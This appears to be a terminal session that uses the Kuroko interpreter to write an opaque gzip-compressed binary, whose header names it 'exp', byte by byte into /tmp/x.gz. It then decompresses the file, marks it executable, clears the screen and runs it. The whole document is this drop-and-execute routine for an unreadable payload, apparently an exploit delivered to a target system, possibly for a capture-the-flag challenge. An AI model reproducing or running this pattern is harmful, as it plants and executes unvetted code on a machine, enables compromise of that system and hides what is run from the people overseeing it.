cd /tmp
touch x.gz
kuroko

import os
let fd = os.open('x.gz', 2)
import os

os.write(fd, b"\x1f\x8b\x08\x08c\xb3pg\x00\x03exp\x00\xb5X}lS\xd7\x15\xbf/\xc6\xce\x17\x89\r\x845k\x19\xbcu\x89\x14*\xe6$e\x93\x02\x1b\xadM\xf8x\xa1\x0e\xa0\xd2\x14\xc4\x16\x12'~n<\x1c\xdb{\xef\x19\x9cMj\x93\xb9\xe9j\x05w\xd14:4\xad\xd2\xfe\xd8\xa6j\xd5\xa4\xee\x0fPV\n6MD\x8aVM\t\xeaG\xd6")
os.write(fd, b'I%\x7f\xac\xd3\xb3\xc2 \x12\x13d\xa3\xe5\xed\x9c\xeb{\xed\xe7\xd7X\x9a4\xedJ\xcf\xe7\xfd~\xef\x9cs\xcf=\xf7\xdc\xfb\xee\xf3\x0b{}\xfb*\x04\x81\xf0VA\x9e \x88\xde\xaf$\x1e\xc4\x1e\xc6\xeb\xf5\x05\x15\xe0:\x88\x1d~7\x92\x06\xe2\x00\xbc\xc6\xa4\xe7!\x05;*\x1b\x99k.\xab\x98\x9e\x8d\xd9\x1dc<H\x8fY\xd62=.')
os.write(fd, b'\x05\x93\xb4\x93\x92\xe61\xcb\xc6\xb5\xac?&\x89\xabh\xe70?\xdf\xc4\xf4\x99\xac\xaa`q\xd8J\xed*\x98]\x07\xb3\xeb`\xfa\\\xf6\xb3\xc0\xfa-\xe3k\r\x87\x06Z\xc3\x01\xb7\x1a-\x8ew\x1ds\x8bcr\x96\x8e\x81\xf6\xc3\xbb\xe6\xb1b~*\x99O\x1cs\r\\\x18F\x1d\\\xd5p\xd5\x93\xf2\r}\xac_\x85\xaf*\xc3;\xcb\xf0\x9b')
os.write(fd, b"\xca\xf0_+\xc3\xb7\x94\xe1[\xcb\xf0\x1d\x94\xaf$\xa2\xbd0\x8f\xb4=QF\xbf\xb3\x0c\x7f\x80\xf25d\xac\xa6\xd4\xcfa\x82y_O\xc4\xcdl\x9e\x19\x7f\xb4\x8c\x9f\x13e\xf8@\x19>T\x86'1%\x14\xd1\x82$\xae\x86e9F\xd4\x11u\xd0\x1f\x0e\xf7\x9d\x0c\x85\xc3$&+JT!\xb1\xb8\xa6\xe2\x03M\x1e\x06m\xb9o\xd8\x1f\x8a")
os.write(fd, b'\x90\xbeP$\xa4\x91`T9Ib\x9a\xe2\x1f\x94I_\x10(\xa2j\x01\xb0"\xc1\xd3JH\x03NN\x80V4&G\x88\x9c\x90\x07O\xc5\x08\x94\xdb \x16\x1b\x1f\'\xd6\xcbZS8o~%\xcfc=\t&~\xca\xc4W\x98\xf8\xac\x89\xb7\x99\xf8wM\xfc\x1a\x13?g\xe2\xcd\xebs\xc1\xc4;L\xfc\xa2\x89\xaf4\xf1\xba\x89\xaf6\xf1')
os.write(fd, b'\xcb&\xbe\xc6\xc4\xaf\x98\xf8:\x13O6\x17y\xf3:\xa92\xf1\xe65\xe82\xf1.s<\x7f\x82\xd1\xeb_\x82!\xbdC\xb1\xf1\xcd\xef5\xc2os\x18~\x9d[<p\x87x\x08\x1f\xe5\x16\rh\xcd\x03\x881\xc5\xb99\x8a\x8f#\xc6\xd4\xe6\xb2\x14?\x8d\x18S\x9a{\x93\xe2\x03\x881\x95\xb9_Q\xbc\x1b1\xa607I\xf1N\xc4\x98\xba')
os.write(fd, b'\xdc(\xc5\x8f#\xc60s1\x8a\x1fC\x8ce\x9d\xeb\xa7\xf8Q\xc4\x98\xba\xdca\x8a\x1fF\x8c)\xcby(^\x8f\x18\xb7\xa0\\\x1b\xc55\x88\xb1Tr"\xc0\x9e\xcb\x18z\xe6-XF\xedY)\xf5\xa9\xf7\xa8\xf7Yo\x8f\xf7\x99#\xd2\xd8\xcdw!J\xfd"(\xa5\xec2\x1d\xfe\x1e\xc0\'\x11O\x8fg\x9d/>\x0f\x96\x19\xecH\xbf\xf7')
os.write(fd, b'\xc00\xda\xaf\xb5_o7R\x9f\xe8\xc7AA\x1a\xcf\xc6?\xc8\xcc\x80S\xfd\x11\xd4\xff$\xf3g\xda\x81~\t4/c\xb0\xa9\x1b\xfa\xfc\x03\xaa\xe8L=\x04\x8e|\xe9\xf3s\xf7\r\xc3\x97\xfe\xfdg\x9f\x19\xc6R\xa3s\xcb\x8b4\xff\xe8\x16\xcc1H\x9d\x80\xab\xf6\xebR:-\xde\xa7>1\x89\xfaR\xdeK\xe2C)yi\x12x[\xfc')
os.write(fd, b'=i\xec\xd2\xebp\xb7\xfb\x03\xc1\x13\xcfd\xfe\n=w\xa7\xee\xe9?B\xc5\xe4\xcd\xaa\xf6\xacq\xbe\x1f\x1eK\x13\xe9\x18\x88\xcc2<\x97&\xce\x0ea\xef\x13\xe9,\x15\xe3\t\xaap\x1e\xdd\xe8\xd58\xba\xec\x1f\x9f\x87\xde\x82\xce\xdbY)}i\x91*\xfd\x06\xcd\x9d\xeb\xc61\xee;\xd2\x1b\xdd[\xffy\xec\xf8\xe4S\xe9\x86oC\x84[\xf2')
os.write(fd, b'\x11\xe2\xb4\xea],\xc2&\xe7\x85q\xe4\xbb\x92\xb3\x82\xf7\xe5\xfdF\xf7\x8e\xdb\xf19\x1fD\xa6\x7fn\x18\xb9\r08\xe7\x16\x929\x8fI\xbb\x8a\x8c\x00L\xe6#\x84\xb3\x00\xa5\xb4\xbc0\x05\xd2\xf8\x8e\xf7\xbb\xde^\xef\to_\xef4$\xd4\x07\x99\x91f\xaf\xb8\x1c0\x88\xe4\xdf\x96\xf5\xb7A%\xe8\xe6\xd9\x0bNN\xe1\x06!\xed\xc2_m')
os.write(fd, b'\xc3\x14r\x10\x8aV\x9dA\xc2X\x0cNN\x07\x8b\xdaX\xdf\x97\xa9\xfe\xd8-*R\xcb\xd2\x95[OJWVl\x92pU\x9a\x7f\xa0\xad+x\xa8d\x1e\xac\xf6\xa3\xbb\xfe\xb2\x11n\xe3\xa7{\xa4\t\xfbGp\x8b5\xf5\x8c\xf7\xed\x16x\x7f\x1e\xb9\xd8\xb6\t\x9d/!\x90\xae\xdc\xb7I\xc9%A\xda\xb1\xa06\x17}H\xc9\xac \xa5\xec\xaf')
os.write(fd, b"\x81\xa5\xd7h\x98\x01'?E';\x16\x94Ou\xac\xdfB\x005\x99\xd1ZH\xcd\xb6{F\x062r\xd5>\x00jB\xef\xb45\x9e\x82\xfe\xe6\x9e\xcb\xfd\x101\xb5\x82\x98\xf4;w\x8dLo\xae\x8ef\x1d\xea:g\xcb\xe7\xbf'3YC\x15\xa0TD)\x1d_\x94f\xf7.Rjv\xaf~6/\x97\x7f\x91\x97+t\xc3\xf8\x1d\xd4+")
os.write(fd, b'\xccne\xbb\xa1\xbf\x00\xb7\x99\xd7p\xc6\xecX\xc4\xff@\x7f8~\xb6\xa2\x927]\xd2\xf8u\xed\x87\xd2\xf85\xed9o\xea\xf3\xae\xd4\xfb\xbe\xf47\xea\xa5\xd4\x9d\xa5\xcd\x85\x98/\xec\xbd!%\xa7\x85\xae\xe4\x0c\x14\xc9\x9e&\xc3\xb7\xe3\x8e\xb6SJw\xdf\x90R\x1f\xefI\xdd\xca\x97\xd4\xdd\xfb\xb4\xa4F\xe6\xf3\xe5\xf2s\x84\xc9\x19\xd7\x94Q')
os.write(fd, b'\xac\x8f\xdei:.X\xd4\xf0\xa0\xc0\xbd\x85{]~\xc9\xff\x9a\xd6}]m\x03\xf8\xbb\x00\x0e\xa8\xf1\xd2\xbc%\x7f\xc9\xdbb{\xd63j\x9cp\xbe\x9a\x05\x8f\x04&d~\x1dN\xd3\x8a\xa1m\xc7\xc1\x1d\xb9\x88G*\\X\xb4?cN\x9a\xe8\\\x81\x89\xadB\x95\xf8\xb24\xd1\xbbrm\xba\xe8sZ\xff\x18*\xf4\x9d\xc2~\xdb:\x10\x8a')
os.write(fd, b'\xb4\xaa\xf1@\x94\x84\xd5\xfc\xbbM&\xbb\xe3\xc1\xa0\xac\x88!U<\xd8\xe3\xf3\xb9kH$\x1a\x8d\x92\xd6\x80|\xaa5\x12\xc7\xf7\xa9*~\xdd+\x06\xfdq\x12\x0b\x05v\x8a\xcd\x81\x1ar\xf0\xd0!\xd2\xed\x1f\x19\x90EE\xf6\x07\xc4\x98_U\xf3\xfe\x95PL\xdc%\xb6%\x9a\xc3\x89m\xa2\x12\x08\x99\x80j\x06\x81\x84\xf9IlW\xfeV\x19')
os.write(fd, b'(X\xb3\x97P\x03\x8b[\xf8\xc1\xd3DH\xb8\x84G\xd6VVMB>\x9bH\xfe\xec4\xf7/\xc3XD\x85z\xd7\xbe\xfa\xc6\x03\xce\xda\xd3U\xa3\xe4\xc9\x87\xbf\xf5\xd8\xf6\xa6G\x91\x86}\x94@\x9a\xc89\xc8B7\x12\xdez\xd7K\x15R\x1dn\xf8mp\xf5\xc3\xf5\x1e<\xfbC\xe1Yg\x9d\xe3\xa9Wl\xe95g\xecIG\xc5\xc9\x1a')
os.write(fd, b'\xe8o_\xedA\x14\xdeZ\xf6\xee\xfa\x19\\\xc7`\x93\xe1\xef\xc3mp\xbd\x0eW\xd3\xbf\rcF\xe0~\x0e\xd59\x0e\xff\xc4\xf6\xca\x9a\xb4\xfd\x8c#Yi\xfb\xa5P\xf0A\xdfs\xac\x912\x98\x9f!bL\xf2\xb3\x06?\xc7\xf1\xbe\xf9y\x8c\x9f\x15\x86\x84\xe2\xf9\x04\x1b\x9c\xb7)\xe6g\x83,{\xce\xdf\xf1\t&y\\\x8dLn$\xa5\x8d')
os.write(fd, b'\x9fQ\xce\xb1\xf3\x00?\xcbt\xb0@\xf9<\xf1\xb3\xc6CL\xea\xb6\xe2{\x1f\xdb\x9c\xad\xf4\x9c\xc8\xfb\xab\xb6\xe0\xffw\xe3\xdf\x17\xd6\xb6\x8f\xe5\xf7Y&\x83L\x9eb\xf2%&_e\xf2\xb7L^`\xf2*\x93\x1f2\xf9w&\xef2\xe9p\x94\xf6\xbb\xff`\x8f\xd8)\x0e*Z\xc8\xad\x92\xfd\x9d\x9d;\xc5\x16\xa0\xb6\x8a\xedm\xee\xed\xee\xb6')
os.write(fd, b"\xe2\xe3\x88\x1b>t\xdc\xea\x90\xaa)\x9a\x7f\x80\xb8\xe1\xf0++1\xe2\x1e\xf2\xabC\xc4\x1d\x18\x89\xa8#\xc3y\xa9)\xc4\xad\xc8a?\x02v\x17\x0bkh\x01GZ\xb7&'\xe0\x97\x1ey\xddJ4\xe0\xd7\xfc\xc4-\x0f\xf5\x05\x15\xff\xb0L\xdc\x83ZTQ\xc1\r\x13#\x11\xffph\x90\xb8\x9f\x8bjy\x1fy\xfd\x01X\xec\xee\xc1\xe8\xf0")
os.write(fd, b"\xb0\x1c\xd1\xfe\xd7y\xe0\r\xeb\x0fK\x89\xd7\x95\xe9{\xb5\xf0\xdc\xdc\x04\x0b\xde@\xf25\xcf\xed\xf9:\x18\xe2\xdf\xbf\x8c\xe7u\xcc\xeb\x8f\xaf\x9b/\xb3>\xb8=_'Yf\x7fN(\xea\x0b\xe4\x8b\xf5\xfbU\xe6\xbb\x10?\xabs\xfe\xbd\xcb\xd7Y\xb9\xf8\xb72\xdf\xdc\x9e\xaf\x939[i?\xd6\xf89\xbf\x9d\xd9\xeff\x98\xaf;\x9d\x19\xf0u")
os.write(fd, b'\x8a\xd0\xb5\x8a\xfd.R\xfc.\xc6\xc6\xf7\x19\x91m$%g\xffU\xe2\xef\xb0\xd8\xb71\xfb6f\xbfh\xd1wYd\xa7\xc5\xde\xc5\xd6\x89\x8b\x11\xdf7\x7f\x0c\x91\xd2o\x08l]\x16{\xbe/\x8e\xb1\x8d\xae\xca\xa2o\x8d\xff\x10\xe3\x1egx\x92\xd9O2\xfb7,\xfa\xdc\x1f\xf7s\x94\x94\xd6\xaf\xa7\x96\xfdO\xc3\nw\xa1\x8c=o~f')
os.write(fd, b'\xcf\xe7\xb7\xf0\xff\t\xdb\xf8\xad\xe3\xb5\xda\x0fY\xec[\x98}\xcb\x7fi\x8f\x7f\xa38L\xf6\x85\xffa\x98}\xbf\xa9\xfe\xcd\xf6\xdco\xc2\xd2?\x7fO\x9cc\x853Z\xa6\x7f.\xc7,\xf6\x8d\xec{\xb1\xb1~\xf5x\xad\xf8\xc7\x8c\xe3\xf6\xfc;]d\xf6\x87-\x13.Z\xec\xcf\xb0\xfe\xdb,<\xb7\xdff\xe1\x85U\xa4\x8d|\xb1\xf9\x98\xfd\xd9')
os.write(fd, b'2\xf6\xbc\xfd\x07\xd2`\x106(\x14\x00\x00')

os.close(fd)
exit()

gunzip x.gz ; chmod +x x ; clear ; ./x
